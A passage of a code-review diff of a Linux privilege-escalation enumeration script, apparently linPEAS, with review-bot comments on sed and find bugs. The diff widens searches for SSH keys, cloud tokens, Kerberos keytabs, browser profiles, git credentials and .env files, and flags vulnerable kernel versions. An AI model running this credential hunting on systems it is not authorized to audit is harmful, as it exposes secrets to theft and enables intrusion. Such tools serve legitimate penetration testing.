"s,$kernelDCW_Ubuntu_Precise_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel7,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelB,${C}[1;31m&${C}[0m," printf $LG"User & Groups: "$NC -(id || (whoami && groups)) 2>/dev/null | sed -E "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -E "s,$groupsVB,${C}[1;31;103m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed -E "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -E "s,$idB,${C}[1;31m&${C}[0m,g" +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$idB,${C}[1;31m&${C}[0m,g" printf $LG"Hostname: "$NC hostname 2>/dev/null printf $LG"Writable 
folder: "$NC;
@@ -703,7 +755,7 @@ if [ "$SCAN_BAN_GOOD" ]; then
 else
 printf $RED"[-] $SCAN_BAN_BAD\n"$NC
 fi
-if [ "`which nmap 2>/dev/null`" ];then
+if [ "`command -v nmap 2>/dev/null`" ];then
 NMAP_GOOD=$GREEN"nmap$B is available for network discover & port scanning, you should use it yourself"
 printf $Y"[+] $NMAP_GOOD\n"$NC
 fi
@@ -755,10 +807,10 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep
 ########################################### prep_to_find() { - echo "$1" | sed 's/ /" -o -name "/g' | sed 's/^/\\( -name "/g' | sed 's/$/" \\)/g' + echo "$1" | sed 's/ /" -o -name "/g' | sed 's/^/ -name "/g' | sed 's/$/" /g' } - printf $GREEN"Caching directories "$NC + printf $GREEN"Caching directories using$Y $THREADS$GREEN threads "$NC SYSTEMD_RELEVANT_NAMES="*.service" TIMERS_RELEVANT_NAMES="*.timer" SOCKETS_RELEVANT_NAMES="*.socket"
@@ -767,9 +819,10 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep
 MYSQL_RELEVANT_NAMES="mysql"
 POSTGRESQL_RELEVANT_NAMES="pgadmin*.db pg_hba.conf postgresql.conf pgsql.conf"
 APACHE_RELEVANT_NAMES="sites-enabled 000-default"
- PHP_RELEVANT_NAMES="sess_* *config*.php"
+ PHP_RELEVANT_NAMES="sess_* *config*.php database.php db.php storage.php"
 WORDPRESS_RELEVANT_NAMES="wp-config.php"
 DRUPAL_RELEVANT_NAMES="settings.php"
+ MOODLE_RELEVANT_NAMES="/config.php"
 TOMCAT_RELEVANT_NAMES="tomcat-users.xml"
 MONGO_RELEVANT_NAMES="mongod*.conf"
 SUPERVISORD_RELEVANT_NAMES="supervisord.conf"
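Review bot: The OS line in the Basic-information hunk is piped through twenty `sed -${E} "s,$kernelDCW_…,…,"` substitutions and none of them guards against the variable being empty; an empty pattern makes sed fail with "no previous regular expression" and, since the chain runs without pipefail, the kernel string simply disappears from the report. The `kernelDCW_*` and `kernelB` variables are defined outside this hunk, so whether any of them can be empty is not visible here; if it can, default each pattern to something that cannot match, e.g. `"s,${kernelDCW_Rhel7:-__unset__},…,"`, or build the chain only from non-empty patterns. The same applies to the `$groupsB`/`$groupsVB`/`$sh_usrs`/`$idB` chain on the User & Groups line.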
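Review bot: Dropping the `\( … \)` wrapper from `prep_to_find` changes `find` semantics for every caller that chains several name groups with `-o`: `-type d -name a -o -name b` is parsed as `(-type d -and -name a) -or -name b`, so `-type d` and any other test placed before the names applies only to the first name and the remaining names match files of every type. The callers live in the last hunk of this diff, whose new side is outside the visible lines, so if they now add grouping themselves this is fine; otherwise keep the parentheses, `sed 's/^/\\( -name "/g' | sed 's/$/" \\)/g'`, or group at each call site.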
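Review bot: `MOODLE_RELEVANT_NAMES="/config.php"` can never match: `prep_to_find` turns it into `-name "/config.php"`, and `find -name` compares against the basename only, which cannot contain a slash (GNU find warns about exactly this). If the leading slash was meant to avoid hitting every `config.php` on the system, `-name` cannot express that; use `config.php` and filter the resulting paths, or give this entry a `-path`-style test instead. The `FIND_MOODLE_RELEVANT_NAMES` line added further down inherits the same dead pattern.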
@@ -782,7 +835,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep
 OVPN_RELEVANT_NAMES="*.ovpn"
 SSH_RELEVANT_NAMES="id_dsa* id_rsa* known_hosts authorized_hosts authorized_keys *.pem *.cer *.crt *.csr *.der *.pfx *.p12 agent* config vault-ssh-helper.hcl .vault-token"
 CLOUD_KEYS_RELEVANT_NAMES="credentials credentials.db legacy_credentials.db access_tokens.db accessTokens.json azureProfile.json cloud.cfg"
- KERBEROS_RELEVANT_NAMES="krb5.conf"
+ KERBEROS_RELEVANT_NAMES="krb5.conf krb5.keytab .k5login kadm5.acl"
 KIBANA_RELEVANT_NAMES="kibana.y*ml"
 KNOCK_RELEVANT_NAMES="knockd"
 LOGSTASH_RELEVANT_NAMES="logstash"
@@ -796,10 +849,23 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep IPSEC_RELEVANT_NAMES="ipsec.secrets ipsec.conf" IRSSI_RELEVANT_NAMES=".irssi" KEYRING_RELEVANT_NAMES="keyrings *.keyring *.keystore" + FILEZILLA_RELEVANT_NAMES="filezilla" + BACKUPMANAGER_RELEVANT_NAMES="storage.php database.php" + PASSWD_SPLUNK_RELEVANT_NAMES="passwd" + GITLAB_RELEVANT_NAMES="secrets.yml gitlab.yml gitlab.rb" + PGP_RELEVANT_NAMES="*.pgp *.gpg .gnupg" + VIM_RELEVANT_NAMES=".*.swp .viminfo" + DOCKER_RELEVANT_NAMES="docker.sock docker.socket Dockerfile docker-compose.yml" + FIREFOX_RELEVANT_NAMES=".mozilla" + CHROME_RELEVANT_NAMES="google-chrome" + AUTOLOGIN_RELEVANT_NAMES="autologin autologin.conf" + FASTCGI_RELEVANT_NAMES="fastcgi_params" + SNMP_RELEVANT_NAMES="snmpd.conf" DB_RELEVANT_NAMES="*.db *.sqlite *.sqlite3 *.sql" - INSTERESTING_RELEVANT_NAMES="*_history .sudo_as_admin_successful .profile *bashrc *httpd.conf *.plan .htpasswd .gitconfig .git-credentials .git .svn *.rhost hosts.equiv Dockerfile docker-compose.yml .viminfo .ldaprc" + INSTERESTING_RELEVANT_NAMES=".msmtprc .env .google_authenticator *_history .recently-used.xbel .lesshst .sudo_as_admin_successful .profile *bashrc *httpd.conf *.plan .htpasswd .gitconfig .git-credentials .git .svn *.rhost hosts.equiv .ldaprc" PASSWORD_RELEVANT_NAMES="*password* *credential* creds*" + BACKUPS_DIRS_RELEVANT_NAMES="backup backups" FIND_SYSTEMD_RELEVANT_NAMES=$(prep_to_find "$SYSTEMD_RELEVANT_NAMES") 
@@ -813,6 +879,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep
 FIND_PHP_RELEVANT_NAMES=$(prep_to_find "$PHP_RELEVANT_NAMES")
 FIND_WORDPRESS_RELEVANT_NAMES=$(prep_to_find "$WORDPRESS_RELEVANT_NAMES")
 FIND_DRUPAL_RELEVANT_NAMES=$(prep_to_find "$DRUPAL_RELEVANT_NAMES")
+ FIND_MOODLE_RELEVANT_NAMES=$(prep_to_find "$MOODLE_RELEVANT_NAMES")
 FIND_TOMCAT_RELEVANT_NAMES=$(prep_to_find "$TOMCAT_RELEVANT_NAMES")
 FIND_MONGO_RELEVANT_NAMES=$(prep_to_find "$MONGO_RELEVANT_NAMES")
 FIND_SUPERVISORD_RELEVANT_NAMES=$(prep_to_find "$SUPERVISORD_RELEVANT_NAMES")
@@ -839,75 +906,70 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep FIND_IPSEC_RELEVANT_NAMES=$(prep_to_find "$IPSEC_RELEVANT_NAMES") FIND_IRSSI_RELEVANT_NAMES=$(prep_to_find "$IRSSI_RELEVANT_NAMES") FIND_KEYRING_RELEVANT_NAMES=$(prep_to_find "$KEYRING_RELEVANT_NAMES") + FIND_FILEZILLA_RELEVANT_NAMES=$(prep_to_find "$FILEZILLA_RELEVANT_NAMES") + FIND_BACKUPMANAGER_RELEVANT_NAMES=$(prep_to_find "$BACKUPMANAGER_RELEVANT_NAMES") + FIND_PASSWD_SPLUNK_RELEVANT_NAMES=$(prep_to_find "$PASSWD_SPLUNK_RELEVANT_NAMES") + FIND_GITLAB_RELEVANT_NAMES=$(prep_to_find "$GITLAB_RELEVANT_NAMES") + FIND_PGP_RELEVANT_NAMES=$(prep_to_find "$PGP_RELEVANT_NAMES") + FIND_VIM_RELEVANT_NAMES=$(prep_to_find "$VIM_RELEVANT_NAMES") + FIND_DOCKER_RELEVANT_NAMES=$(prep_to_find "$DOCKER_RELEVANT_NAMES") + FIND_FIREFOX_RELEVANT_NAMES=$(prep_to_find "$FIREFOX_RELEVANT_NAMES") + FIND_CHROME_RELEVANT_NAMES=$(prep_to_find "$CHROME_RELEVANT_NAMES") + FIND_AUTOLOGIN_RELEVANT_NAMES=$(prep_to_find "$AUTOLOGIN_RELEVANT_NAMES") + FIND_FASTCGI_RELEVANT_NAMES=$(prep_to_find "$FASTCGI_RELEVANT_NAMES") + FIND_SNMP_RELEVANT_NAMES=$(prep_to_find "$SNMP_RELEVANT_NAMES") FIND_DB_RELEVANT_NAMES=$(prep_to_find "$DB_RELEVANT_NAMES") FIND_INSTERESTING_RELEVANT_NAMES=$(prep_to_find "$INSTERESTING_RELEVANT_NAMES") FIND_PASSWORD_RELEVANT_NAMES=$(prep_to_find "$PASSWORD_RELEVANT_NAMES") + FIND_BACKUPS_DIRS_RELEVANT_NAMES=$(prep_to_find "$BACKUPS_DIRS_RELEVANT_NAMES") + #Get home + HOMESEARCH="/home/ /Users/ /root/ `cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " "`" + if [ ! "`echo \"$HOMESEARCH\" | grep \"$HOME\"`" ] && [ ! 
"`echo \"$HOMESEARCH\" | grep -E \"^/root|^/home|^/Users\"`" ]; then #If not listed and not in /home, /Users/ or /root, add current home folder + HOMESEARCH="$HOME $HOMESEARCH" + fi # Directories - FIND_DIR_VAR=$(eval find /var -type d $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_VAR" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_DIR_ETC=$(eval find /etc -type d $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_DBUS_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_ETC" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_DIR_HOME=$(eval find /home -type d $FIND_APACHE_RELEVANT_NAMES -o $FIND_VNC_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_HOME" ]; then printf $RED". "$NC; else printf $GREEN". 
"$NC; fi - FIND_DIR_ROOT=$(eval find /root -type d $FIND_APACHE_RELEVANT_NAMES -o $FIND_VNC_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_ROOT" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_DIR_TMP=$(eval find /tmp -type d $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_TMP" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_DIR_USR=$(eval find /usr -type d $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_USR" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_DIR_OPT=$(eval find /opt -type d $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_OPT" ]; then printf $RED". "$NC; else printf $GREEN". 
"$NC; fi + CONT_THREADS=0 + FIND_DIR_VAR=`eval_bckgrd "find /var -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find /etc -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_DBUS_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_DIR_HOME=`eval_bckgrd "find $HOMESEARCH -type d $FIND_CHROME_RELEVANT_NAMES -o $FIND_FIREFOX_RELEVANT_NAMES -o $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_VNC_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find /usr -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find /opt -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d $FIND_MYSQL_RELEVANT_NAMES -o $FIND_CHROME_RELEVANT_NAMES -o $FIND_FIREFOX_RELEVANT_NAMES -o $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_VNC_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` #MacOS Directories - FIND_DIR_USERS=$(eval find /Users -type d $FIND_APACHE_RELEVANT_NAMES -o $FIND_VNC_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_USERS" ]; then printf $RED". "$NC; else printf $GREEN". 
"$NC; fi - FIND_DIR_PRIVATE=$(eval find /private -type d $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_PRIVATE" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_DIR_APPLICATIONS=$(eval find /Applications -type d $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_APPLICATIONS" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi + FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_DIR_APPLICATIONS=`eval_bckgrd "find /Applications -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` # All - FIND_HOME=$(eval find /home/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_PASSWORD_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_HOME" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_ETC=$(eval find /etc/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_KNOCK_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_ETC" ]; then printf $RED". 
"$NC; else printf $GREEN". "$NC; fi - FIND_ROOT=$(eval find /root/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_PASSWORD_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_ROOT" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_VAR=$(eval find /var/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o 